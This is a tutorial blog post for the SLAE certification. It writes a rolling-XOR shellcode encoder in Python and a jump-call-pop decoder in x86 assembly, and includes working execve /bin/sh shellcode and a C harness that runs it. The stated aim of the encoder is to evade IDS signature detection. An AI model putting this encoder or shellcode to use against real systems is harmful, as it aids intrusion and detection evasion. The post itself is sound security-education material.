Assembly Language and Shellcoding on Linux - Part 5 (Assignment 4)

Custom Encoding Schemes

Assignment 4

For this assignment we were given the following tasks:

  • Create a custom Shellcode encoder
  • Encode a stack based execve shell using the custom encoder

Why use an encoder?

Most shellcode will be picked up by firewalls and intrusion detection systems (IDS) based on its signature. By using an encoder we can hope to evade detection by changing the signature of our shellcode.
The trade-off is that our shellcode gets bigger, because the decoding routine has to be sent along with it.

Overview

In order to encode our shellcode we are going to use XOR encoding. We could just XOR every byte of the shellcode with the same key byte, but for this post I'm going to do a rolling XOR. That is, I'm going to take the output of the first byte's XOR as the key for the second byte, then that output as the key for the third, and so on.

XOR

The truth table of A XOR B shows that it outputs true whenever the inputs differ:

XOR Truth Table

Input    Output
A   B    A ^ B
0   0    0
0   1    1
1   0    1
1   1    0

Let's have a look at the relationships of XOR (^) on a byte. We will XOR 0x90 with 0x41:

0x90 ^ 0x41

0x90            10010000
0x41            01000001
Result (0xd1)   11010001

Let's see what happens if we take our output (0xd1) and XOR that with 0x90:

0x90 ^ 0xd1

0x90            10010000
0xd1            11010001
Result (0x41)   01000001

This means that:
A ^ B = C
B ^ C = A
C ^ A = B

This also means that as long as we know the key byte that an encoded byte was XORed with, XORing the encoded byte with that key again gives us back our original byte.
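
If you want to convince yourself of these relationships, they are easy to check in Python. This is only a quick sketch using the same 0x90 and 0x41 values as above; the variable names are my own.

```python
# Illustrative check of the XOR relationships using the values from above.
a = 0x90          # key byte
b = 0x41          # original byte
c = a ^ b         # encoded byte

print(hex(c), format(c, "08b"))   # 0xd1 11010001

# XORing any two of the three values gives back the third.
assert a ^ b == c
assert b ^ c == a
assert c ^ a == b

# Applying the same key twice returns the original byte.
assert (b ^ a) ^ a == b
```

The last assertion is the property the decoder relies on: encoding and decoding are the same operation with the same key.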

Rolling XOR

As stated at the start of the assignment we will be using a rolling XOR to encode our shellcode. We will take an initial seed byte to use to encode the first byte and use the output byte as the key for our next byte.
Put another way, each encoded byte is the original byte XORed with the previous encoded byte, with the seed standing in for the byte before the first one. Using a seed of 0x90 and the first three bytes of the shellcode we will encode below (0x31, 0xc0, 0x50):

0x31 ^ 0x90 = 0xa1
0xc0 ^ 0xa1 = 0x61
0x50 ^ 0x61 = 0x31

Python Rolling XOR Encoder

To encode our shellcode we will write a Python script that does the work for us and prints output that we can paste straight into our assembly.

#!/usr/bin/python

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

out = []  
out.append(0x90)

for i in range(0, len(shellcode)):  
    b1 = ord(shellcode[i]) ^ out[i]
    out.append(b1)

print("\nOut Length: ")  
print(str(len(out)-1))  
print(", ".join(hex(c) for c in out[1::]))  

Let's break this code down a bit to see what we are doing.
First we create a variable to hold our shellcode:

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"  

Next we need to create an array to hold our output bytes. We also place our seed byte as the first item in the output byte array:

out = []  
out.append(0x90)  

Next we XOR each byte in our shellcode with the byte at the same index in the output array. Because the array starts with the seed, out[i] is always the previous encoded byte (or the seed for the first byte), and each result is appended ready for the next iteration. We use ord to change the char to an int for the XOR operation.

for i in range(0, len(shellcode)):  
    b1 = ord(shellcode[i]) ^ out[i]
    out.append(b1)

We then print the length of the encoded shellcode (we will need this later) and format the out array, skipping the seed at index 0, as a string that we can paste directly into our assembly.

print("\nOut Length: ")  
print(str(len(out)-1))  
print(", ".join(hex(c) for c in out[1::]))  

That's it! Running the code gives us the following output:

Out Length:  
25  
0xa1, 0x61, 0x31, 0x59, 0x76, 0x59, 0x2a, 0x42, 0x2a, 0x5, 0x67, 0xe, 0x60, 0xe9, 0xa, 0x5a, 0xd3, 0x31, 0x62, 0xeb, 0xa, 0xba, 0xb1, 0x7c, 0xfc  

The Assembly

OK, we've got our encoded shellcode. We now need to write the assembly that will decode it and then run it.

Jump Call Pop

In our assembly we will have our shellcode, but we don't know in advance what address it will end up at.
In order to get the address of our encoded shellcode we will use the 'Jump Call Pop' technique. This technique works as follows:

  • We short jump to a label placed just above our shellcode
  • At that label we call back to where our decoder starts
  • The call pushes its return address, which is the address just after the call instruction (our shellcode), so ESP now points at it and we can pop it into a register

That might sound a little confusing so I'll show you what's happening by stepping through it with gdb-peda.

Firstly we will use some example code:

global _start

section .text  
_start:  
    jmp short call_decoder

decoder:  
    pop esi

call_decoder:  
    call decoder
    Shellcode: db "Our Shellcode will be at this address"

We compile and link that, then run gdb, set the disassembly-flavor to intel, set a breakpoint on _start and run to it.
Our next instruction is the short jump to call_decoder:

jmp        0x8048083 <call_decoder>  

Notice ESP is pointing to the top of the stack.
Let's step one instruction:
Here we see that our next instruction is the call to the decoder function:

call    0x8048082 <decoder>  

Notice ESP is still at the same position.
Next instruction:
We've gone into our decoder function, and ESP now points to a new top of the stack that holds the return address pushed by the call: 0x8048088, the address of the start of our shellcode.
So we can simply pop that address off the stack and store it in esi for use later.
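
The addresses in the walkthrough can be reproduced with a little arithmetic. The sketch below assumes the usual 32-bit encodings (2 bytes for jmp short, 1 byte for pop esi, 5 bytes for a call with a 32-bit displacement) and the _start address of 0x8048080 implied by the gdb output; the constant names are just for illustration.

```python
# Rough model of where each label lands, assuming standard instruction sizes.
START = 0x8048080        # assumed address of _start, implied by the gdb output

JMP_SHORT_LEN = 2        # jmp short rel8
POP_ESI_LEN = 1          # pop esi
CALL_REL32_LEN = 5       # call rel32

decoder = START + JMP_SHORT_LEN
call_decoder = decoder + POP_ESI_LEN
# call pushes the address of whatever follows it (the return address),
# and our shellcode bytes sit exactly there.
return_address = call_decoder + CALL_REL32_LEN

print(hex(decoder))         # 0x8048082
print(hex(call_decoder))    # 0x8048083
print(hex(return_address))  # 0x8048088
```

The last value is what ends up on top of the stack when we land in decoder, which is why a single pop is enough to grab it.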

The Decoder

Now we have access to the address of our shellcode let's work out the process to actually decode and run it.
What we will do is basically reverse the process that we created in our Python script.

  • Take the first byte of our encoded shellcode
  • XOR it with our seed byte (0x90)
  • Save the encoded byte as our next XOR key
  • Overwrite the encoded byte in the shellcode with the result of the XOR
  • Move to the next byte and loop until the end of our shellcode
  • Pass execution to the address of the start of our shellcode
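
Before writing any assembly, the same steps can be modelled in Python to check the logic. This is only a sketch: the variable names mirror the registers I use in the assembly version, esi is an index rather than a real pointer, and the final jump is replaced by a comparison against the original shellcode.

```python
# Python model of the decoder loop, working in place on the encoded bytes.
encoded = bytearray([
    0xa1, 0x61, 0x31, 0x59, 0x76, 0x59, 0x2a, 0x42, 0x2a, 0x05, 0x67, 0x0e,
    0x60, 0xe9, 0x0a, 0x5a, 0xd3, 0x31, 0x62, 0xeb, 0x0a, 0xba, 0xb1, 0x7c,
    0xfc,
])

al = 0x90              # current key, starts as the seed
esi = 0                # index into the buffer (a pointer in the real thing)
ecx = len(encoded)     # loop counter

while ecx > 0:
    dl = encoded[esi]          # keep a copy of the encoded byte
    encoded[esi] = al ^ dl     # overwrite it with the decoded byte
    al = dl                    # the encoded byte is the next key
    esi += 1
    ecx -= 1

# The original execve shellcode from the encoder script.
original = bytes.fromhex(
    "31c050682f2f7368682f62696e89e35089e25389e1b00bcd80"
)
assert bytes(encoded) == original
print(bytes(encoded).hex())
```

Note that the encoded byte has to be copied before it is overwritten, otherwise the key for the next byte is lost. That is why the model (and the assembly) needs a second register.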

Here's how it looks in assembly:

global _start

section .text  
_start:

    jmp short call_decoder

decoder:  
    pop esi             ; Store our shellcode start address in esi
                        ; Only cl is written below, so the rest of ecx is assumed to be zero
    mov cl, 25          ; Set our counter (shellcode is 25 bytes long)
    xor eax, eax        ; Zero eax
    cdq                 ; Zero edx (sign-extends eax, which is 0, into edx)
    mov al, 0x90        ; Move 0x90 (XOR seed) into al
decode:
    mov dl, [esi]       ; Move the encoded byte at esi into dl
    xor al, dl          ; XOR the key in al with the encoded byte in dl
    mov [esi], al       ; Overwrite the encoded shellcode with the decoded result
    mov al, dl          ; Move the encoded byte into al to use as the next key
    inc esi             ; Move on to the next byte
    loop decode         ; Decrement ecx and loop until it is 0 (25 times)

    jmp short Shellcode ; Pass execution to the decoded shellcode

call_decoder:
    call decoder
    Shellcode: db 0xa1, 0x61, 0x31, 0x59, 0x76, 0x59, 0x2a, 0x42, 0x2a, 0x5, 0x67, 0xe, 0x60, 0xe9, 0xa, 0x5a, 0xd3, 0x31, 0x62, 0xeb, 0xa, 0xba, 0xb1, 0x7c, 0xfc

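We can't test this code just by assembling and linking it, because the decoder overwrites the shellcode in place and the .text section is not writable by default. Instead we will throw the objdump hex output into our C test harness: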

$ for i in `objdump -D encoder | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done

\xeb\x15\x5e\xb1\x19\x31\xc0\x99\xb0\x90\x8a\x16\x30\xd0\x88\x06\x88\xd0\x46\xe2\xf5\xeb\x05\xe8\xe6\xff\xff\xff\xa1\x61\x31\x59\x76\x59\x2a\x42\x2a\x05\x67\x0e\x60\xe9\x0a\x5a\xd3\x31\x62\xeb\x0a\xba\xb1\x7c\xfc

#include <stdio.h>
#include <string.h>

unsigned char code[] =
"\xeb\x15\x5e\xb1\x19\x31\xc0\x99\xb0\x90\x8a\x16\x30\xd0\x88\x06\x88\xd0\x46\xe2\xf5\xeb\x05\xe8\xe6\xff\xff\xff\xa1\x61\x31\x59\x76\x59\x2a\x42\x2a\x05\x67\x0e\x60\xe9\x0a\x5a\xd3\x31\x62\xeb\x0a\xba\xb1\x7c\xfc";

int main(void)
{
    /* strlen stops at the first null byte, so this is only accurate for null-free shellcode */
    printf("Shellcode Length:  %zu\n", strlen((const char *)code));

    /* Treat the byte array as a function and call it */
    int (*ret)() = (int(*)())code;

    ret();

    return 0;
}

Compile the C code:

$ gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode  

Testing gives us our result:

$ ./shellcode
Shellcode Length:  53  
$ whoami
root  

So our decoder is working and our execve /bin/sh shellcode is running.
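
As a final sanity check, the 53 bytes reported by the harness can be split into the decoder stub and the encoded payload, and the two relative jumps can be resolved by hand. This is a rough sketch that assumes the standard encodings (eb followed by an 8-bit displacement for jmp short, e8 followed by a signed 32-bit little-endian displacement for call); the variable names are mine.

```python
# Bytes copied from the test harness, split into decoder stub and payload.
stub = bytes.fromhex(
    "eb155eb11931c099b0908a1630d0880688d046e2f5eb05e8e6ffffff"
)
payload = bytes.fromhex(
    "a161315976592a422a05670e60e90a5ad33162eb0abab17cfc"
)
code = stub + payload

print(len(stub), len(payload), len(code))   # 28 25 53

# The first jmp short (eb 15) is relative to the end of its own 2 bytes.
jmp_target = 2 + code[1]

# The call sits at jmp_target; its displacement is relative to the end of
# the 5-byte call instruction.
rel32 = int.from_bytes(code[jmp_target + 1:jmp_target + 5], "little", signed=True)
call_target = jmp_target + 5 + rel32

print(hex(jmp_target), hex(call_target))    # 0x17 0x2

# strlen() in the harness would stop early if any byte were zero.
assert 0 not in code
```

Offset 0x17 is the call instruction and offset 0x2 is the pop esi at the start of the decoder, so the jump and the call line up with the Jump Call Pop layout described earlier.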

Full code is available on my GitHub page:
https://github.com/DeathsPirate/SLAE/


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-734